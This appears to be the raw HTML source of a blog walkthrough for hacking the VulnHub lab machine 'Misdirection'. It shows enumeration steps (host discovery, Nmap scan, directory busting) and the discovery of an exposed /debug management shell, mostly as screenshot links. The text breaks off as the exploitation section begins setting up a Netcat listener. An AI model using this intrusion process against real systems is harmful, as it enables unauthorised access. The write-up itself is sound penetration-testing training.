src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGZCOYzSZwGQ4YD-tvLhQy04LTTSlWq5sAVr5O6vp9t8cC37T53CZMYfrjZ3sRt_JRi6cKklJbsNvWwf3pE5TCCz9GHyXny43LF01a8l2rS46jSq5PKMTaBEl4hVYlbV1tGoapwu_6PGZk/s16000/screenshot.35.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Misdirection&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Misdirection&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/misdirection-1,371/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/misdirection-1,371/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded &lt;b&gt;Misdirection&lt;/b&gt; and extracted with VmWare:&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR7jebDzcgr0FoHqbOty8W-iaqZY6VQxP0OzQM-UZFbSoh0TApxeiCY3k8pjtn0QgsJWUk-wO1t6E5MKnRw2MwcLGBWBkzjfhy6w6G0ugy2-OGu3fwN8xjkE4qHwDLzSf47enHoQH8nOP1/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;427&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR7jebDzcgr0FoHqbOty8W-iaqZY6VQxP0OzQM-UZFbSoh0TApxeiCY3k8pjtn0QgsJWUk-wO1t6E5MKnRw2MwcLGBWBkzjfhy6w6G0ugy2-OGu3fwN8xjkE4qHwDLzSf47enHoQH8nOP1/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- netdiscover helps to identify Misdirection&#39;s IP 192.168.1.28:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDu3y-DYFG8xAcwVC3uWBtfohY0zPtfsqxks6se-9SgsOFMxY4C1IEbusWqHioNxq8eZ2wuzhDMwt5Xi1L39Gfs50iUU3yPg3-kXof6Hfjl1Ks9kl3rmibCnIeED35PPLhX0yOyvWfr5w/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;446&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDu3y-DYFG8xAcwVC3uWBtfohY0zPtfsqxks6se-9SgsOFMxY4C1IEbusWqHioNxq8eZ2wuzhDMwt5Xi1L39Gfs50iUU3yPg3-kXof6Hfjl1Ks9kl3rmibCnIeED35PPLhX0yOyvWfr5w/s16000/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT1qhtG9RDvxUs-Y8mVyXMULNcyQISPhcIUBV8ZYNz68oxmUgnKwHP9exgeOrKGDnwTaXBK4i9t75SQnMK9OMRAnvz3SQ2uMTu6-OgktKFzUNiDe-6fl52TA4bSph40PDH2zl4-42Dkqsb/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;211&quot; data-original-width=&quot;802&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT1qhtG9RDvxUs-Y8mVyXMULNcyQISPhcIUBV8ZYNz68oxmUgnKwHP9exgeOrKGDnwTaXBK4i9t75SQnMK9OMRAnvz3SQ2uMTu6-OgktKFzUNiDe-6fl52TA4bSph40PDH2zl4-42Dkqsb/s16000/screenshot.6.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3rN-zjkeckSXZs0P7FEi0DX2cueX4cFYsPHIkOsm3Th25k-gOV-3_D10mpHdmdCy06r3L_brZApL34ZiD8J5M9fZzz-h2Zz9KIZOAp6p2NqBYGtAE9GV0bkIIMKLF71wvEsTpuX0Ysw-D/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;281&quot; data-original-width=&quot;436&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3rN-zjkeckSXZs0P7FEi0DX2cueX4cFYsPHIkOsm3Th25k-gOV-3_D10mpHdmdCy06r3L_brZApL34ZiD8J5M9fZzz-h2Zz9KIZOAp6p2NqBYGtAE9GV0bkIIMKLF71wvEsTpuX0Ysw-D/s16000/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing ports 80 and 8080:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy984IZ-z_dP9AGMlCMY_awM74MhpUN_0g8_18kBuucYMAvkb3oJsBXNs3bxVBn8d_fSLCaSLPcDiTHX620O4zDrH_Qw5Lc9wJDIs3iJYfhguKTMDbn2xBt_ku_1eSrKIIlEf3VgrhhdTE/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;512&quot; data-original-width=&quot;530&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy984IZ-z_dP9AGMlCMY_awM74MhpUN_0g8_18kBuucYMAvkb3oJsBXNs3bxVBn8d_fSLCaSLPcDiTHX620O4zDrH_Qw5Lc9wJDIs3iJYfhguKTMDbn2xBt_ku_1eSrKIIlEf3VgrhhdTE/s16000/screenshot.4.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1K5_xL_l4C3cXhyk4oBQKI-vm3p0F0CGXON3AS7rnEB_rN1Cdj7PlRnKvI-RVvpIT7VEbFsSPEr5lYB6vh8y6xpHd-D1i7jwtVmdy-6PA-cUZ4rMH5oHbCgMWLlG7Y-ZOv8o52lo3CA0s/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;392&quot; data-original-width=&quot;594&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1K5_xL_l4C3cXhyk4oBQKI-vm3p0F0CGXON3AS7rnEB_rN1Cdj7PlRnKvI-RVvpIT7VEbFsSPEr5lYB6vh8y6xpHd-D1i7jwtVmdy-6PA-cUZ4rMH5oHbCgMWLlG7Y-ZOv8o52lo3CA0s/s16000/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting&amp;nbsp; web server at port 8080:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8x9yfXijCpA-gBlTwBLnPHgKgdb-_t3ndo7Ma4JqiJ4O2ZnKoOr03dA_bmMv8marWeffMbt4STup2ThP4HGh5r-LQfhcd71Q897rRanb71KZ-Zlfteb6hh85ufAXMYd8sHhL49dXcRP5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;789&quot; data-original-width=&quot;667&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8x9yfXijCpA-gBlTwBLnPHgKgdb-_t3ndo7Ma4JqiJ4O2ZnKoOr03dA_bmMv8marWeffMbt4STup2ThP4HGh5r-LQfhcd71Q897rRanb71KZ-Zlfteb6hh85ufAXMYd8sHhL49dXcRP5/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEvXWEkr0lj5YrmZtjj6AsmACiqcGJaxhnV1pSfME7DVR-n3CXI-oh5LzNTD33bMwNX6SNQfDIrwhhwVwQ9dH-PG55pVdWcYcgebiYSmUtGNWx0d-hoD0eXLCd2oyURNi3Xjy7VgyKu-eH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEvXWEkr0lj5YrmZtjj6AsmACiqcGJaxhnV1pSfME7DVR-n3CXI-oh5LzNTD33bMwNX6SNQfDIrwhhwVwQ9dH-PG55pVdWcYcgebiYSmUtGNWx0d-hoD0eXLCd2oyURNi3Xjy7VgyKu-eH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEvXWEkr0lj5YrmZtjj6AsmACiqcGJaxhnV1pSfME7DVR-n3CXI-oh5LzNTD33bMwNX6SNQfDIrwhhwVwQ9dH-PG55pVdWcYcgebiYSmUtGNWx0d-hoD0eXLCd2oyURNi3Xjy7VgyKu-eH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEvXWEkr0lj5YrmZtjj6AsmACiqcGJaxhnV1pSfME7DVR-n3CXI-oh5LzNTD33bMwNX6SNQfDIrwhhwVwQ9dH-PG55pVdWcYcgebiYSmUtGNWx0d-hoD0eXLCd2oyURNi3Xjy7VgyKu-eH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;98&quot; data-original-width=&quot;514&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEvXWEkr0lj5YrmZtjj6AsmACiqcGJaxhnV1pSfME7DVR-n3CXI-oh5LzNTD33bMwNX6SNQfDIrwhhwVwQ9dH-PG55pVdWcYcgebiYSmUtGNWx0d-hoD0eXLCd2oyURNi3Xjy7VgyKu-eH/s16000/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- After browsing some webpages we find a management shell at webpage &lt;b&gt;/debug&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxUhbFE5gQMPqzGpWqyATOsNen6WZ4MbcLDsdokmCJwVlD2DXvjVrIKQXtBw-_riQuWGgKbB0obtwYmPutRaOeRTHKwQIkl9lchcFAYgIDNPLvd1-aqtnfC445L4trRUvUUIdpyh5Q1yRc/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;530&quot; data-original-width=&quot;722&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxUhbFE5gQMPqzGpWqyATOsNen6WZ4MbcLDsdokmCJwVlD2DXvjVrIKQXtBw-_riQuWGgKbB0obtwYmPutRaOeRTHKwQIkl9lchcFAYgIDNPLvd1-aqtnfC445L4trRUvUUIdpyh5Q1yRc/s16000/screenshot.9.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrUKqhum4BJnqMD51K5xCVGNUefnvUHtuvxjEQo73-CFSYdWIQytAv4baxVmjkiIxR1bEyiKKI4lbRlOIEEEsoOK1nsFJPPsnnU8Ve6vR9TJv7Se5kPhr0spzF9p-oMffFXtoZN9wG_GP/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;103&quot; data-original-width=&quot;444&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrUKqhum4BJnqMD51K5xCVGNUefnvUHtuvxjEQo73-CFSYdWIQytAv4baxVmjkiIxR1bEyiKKI4lbRlOIEEEsoOK1nsFJPPsnnU8Ve6vR9TJv7Se5kPhr0spzF9p-oMffFXtoZN9wG_GP/s16000/screenshot.10.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a Netcat listener at port 5555:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: 